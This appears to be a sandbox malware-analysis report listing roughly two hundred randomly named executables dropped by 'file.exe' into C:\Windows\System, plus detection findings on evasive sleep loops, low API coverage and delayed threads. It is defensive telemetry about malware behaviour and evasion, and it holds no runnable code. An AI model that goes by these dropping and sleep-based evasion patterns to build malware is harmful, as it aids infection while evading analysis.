Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\DNhkeWm.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\AOSuUmd.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\svRRwoZ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\nKUJunm.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\mWAGJFM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\cLSDHvv.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\HuKkgJY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\mBbgLGb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\uHZGZjz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\sOpjlAo.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\jzfTIlb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\fWWVlTg.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\PZXDYlu.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\DCqXTox.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\PbUiiSM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\DTREvJC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\VsobEcA.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\HeXCeXe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\BtXtEfY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\CVYvaQs.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\KeLPRxW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\sOGcIfs.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\tWOQBIk.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\SNcreuq.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\tRGqWXW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\mshbGSl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\ccbrmxM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\sJZigTD.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\iIwdGAS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\RlLCkUy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\caYiRYR.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\otCfESI.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\WvowvSL.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\MLxwqET.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\BnLcQMe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\mdMaqgD.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\rTpsbWr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\cBoEBlV.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\NqPZXyD.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\YUQTINM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\dbgHMyC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\fEOJwwW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\cyvijMt.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\ykZgpGK.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\ppfNNTX.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\PABSWXd.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\MCvhdFU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\fYMwhpS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\YIjJOqk.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\JqFVNbS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\ASKjfZy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\wNVvJxX.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\PUqZmPS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\oCLXTVT.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\dPvMBBP.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\NzANgdB.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\hhEeZzN.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\CoTJSDT.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\wnWUbPS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\vREuzRr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\VjXLpYb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\ZFvVqBc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\eLYbCEG.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\lVudyTV.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\MgoHIfZ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\sFwDWFc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\WdIXuil.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\jqUGnrw.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\usscfzm.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\rXBWFEL.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\ZDeifCM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\mEVTdIJ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\DBfMBcY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\XqXHiyf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\ajEytdP.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\PRQFErV.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\blOLvcj.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\iYYYydA.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\XbARtow.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\vKoIcLB.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\JGfFPYZ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\mZnsuql.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\DrKJjXc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\xAngvPh.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\JRnaUrS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\wPprRzW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\xyokMuX.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\ckHJCFb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\IBWzTMA.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\iSmvfWm.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\kPkYoOt.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\FlmGZHf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\pnGqAlS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\VExclqz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\HHsWpNX.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\LFQLRaY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\mtnXczE.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\ghXRScL.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\HjdahEF.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\pMMnfcQ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\uwKMlqy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\aFbtfKK.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\hzIYZSD.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\QqSzknx.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\LTWTGcY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\gQbnwXn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\LLELsGo.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\eIthybV.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\tXVZMjj.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\LCScugy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\SYLAfii.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\wWwDsEl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\eaXsKmO.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\uBSPQKP.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\brplcms.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\UQPgIol.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\NrRaZIJ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\DTVvNoy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\zJwJxgA.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\RKUSbZV.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\lBrohsB.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\hyzwXgh.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\jkErNHB.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\rwUXwnj.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\skgGGJN.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\nJZyUBH.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\gAPrxpM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\zYyqoWF.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\AXEGSHs.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\ucDGEkw.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\GaSDvNs.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\iJpJhmt.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\PdxLXDE.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\LYzOvkf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\uNQcZEb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\JdmbeCb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\hMvDOJd.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\pGmaKvE.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\ltlcnHD.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\zzbooXY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\EENzfBP.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\tzOEnrH.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\QrBMIBp.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\NDapyRM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\FaabrKu.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\CGpcHNw.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\RtRmRJz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\SOFlTuM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\pBTelAj.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\GoSpvOG.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\SxjZpBy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\bsgTRXG.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\LPMtFlZ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\tJmWuwF.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\jmSIZKC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\pPLiGBV.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\OgBLDNx.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\dmPtXnK.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\yuTigyc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\dMXkTWG.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\cVpmxhg.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\QZBRXHU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\ssUJwoR.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\mByREeI.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\EzVUaNc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\lQcYvMS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\ndpwHPZ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\rtBLYbw.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\VPuwqFY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\ihDRfqA.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\sctmwAr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\EZbURBQ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\uJEYoyF.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\geBTNDq.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\rKZvlov.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\XJEUdeq.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\TVNHEGY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\KVTiBjz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\PjowoJp.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\sPniyBl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\FoekgWP.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\sDLqeeh.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\wsmNUVo.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\bFsdWPU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\lrIaMFU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\WvkREuJ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Windows\System\aBqatWR.exe	Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Windows\System\xIpouRJ.exe	API coverage: 0.7 %
Source: C:\Windows\System\ERbKWDm.exe	API coverage: 2.1 %
Source: C:\Windows\System\wHnuprt.exe	API coverage: 2.1 %
Source: C:\Windows\System\uxMRJKa.exe	API coverage: 2.1 %
Source: C:\Windows\System\bJVoOik.exe	API coverage: 1.4 %
Source: C:\Windows\System\wkazDeV.exe	API coverage: 2.1 %
Source: C:\Windows\System\VWrcuzM.exe	API coverage: 1.8 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7144	Thread sleep count: 6117 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7144	Thread sleep count: 3630 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8096	Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4240	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System\xIpouRJ.exe TID: 6324	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\ERbKWDm.exe TID: 6752	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\wHnuprt.exe TID: 2024	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\uxMRJKa.exe TID: 5260	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\bJVoOik.exe TID: 6368	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\wkazDeV.exe TID: 6340	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\VWrcuzM.exe TID: 6012	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\wJNkgSa.exe TID: 7024	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\imwRXsl.exe TID: 6400	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\bzSbRdi.exe TID: 820	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\Csmwgyb.exe TID: 6732	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\defQfgC.exe TID: 6420	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\XZxtJFw.exe TID: 1412	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\MwFvbxc.exe TID: 6364	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\hAOVVjq.exe TID: 6344	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\oxCQuSo.exe TID: 524	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\vyHGCnK.exe TID: 432	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\mbSqRHL.exe TID: 5096	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\VFkciqc.exe TID: 6168	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\sdTevgk.exe TID: 6768	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\eVVPPqR.exe TID: 6444	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\VHwkuIa.exe TID: 1452	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\WLWcTVM.exe TID: 336	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\WCbcoxD.exe TID: 5984	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\QWtCxan.exe TID: 576	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\fpHmIIc.exe TID: 4016	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\FGSooXz.exe TID: 7044	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\mKdsHiQ.exe TID: 5064	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\nWSykjl.exe TID: 7192	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\LKurWpq.exe TID: 7208	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\iHSYLud.exe TID: 7224	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\tyQdqmC.exe TID: 7240	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\sabRErB.exe TID: 7260	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\ZTSJHKb.exe TID: 7276	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\xNhRSWh.exe TID: 7292	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\jtnQpnb.exe TID: 7308	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\hEUEsIC.exe TID: 7324	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System\UqXZtcb.exe TID: 7340	Thread sleep time: -41000s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System\xIpouRJ.exe

Code function: 4_2_00007FF66685B760 CreateEventA,SetErrorMode,RtlInitializeCriticalSection,GetSystemInfo,RtlInitializeCriticalSection,RtlInitializeCriticalSection,SetConsoleCtrlHandler,CreateSemaphoreA,GetLastError,CreateFileW,QueueUserWorkItem,RtlInitializeCriticalSection,QueryPerformanceFrequency,SetEvent,CloseHandle,WaitForSingleObject,GetLastError,

4_2_00007FF66685B760

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System\xIpouRJ.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\ERbKWDm.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\wHnuprt.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\uxMRJKa.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\bJVoOik.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\wkazDeV.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\VWrcuzM.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\wJNkgSa.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\imwRXsl.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\bzSbRdi.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\Csmwgyb.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\defQfgC.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\XZxtJFw.exe	Thread delayed: delay time: 41000
Source: C:\Windows\System\MwFvbxc.exe	Thread delayed: delay time: 41000
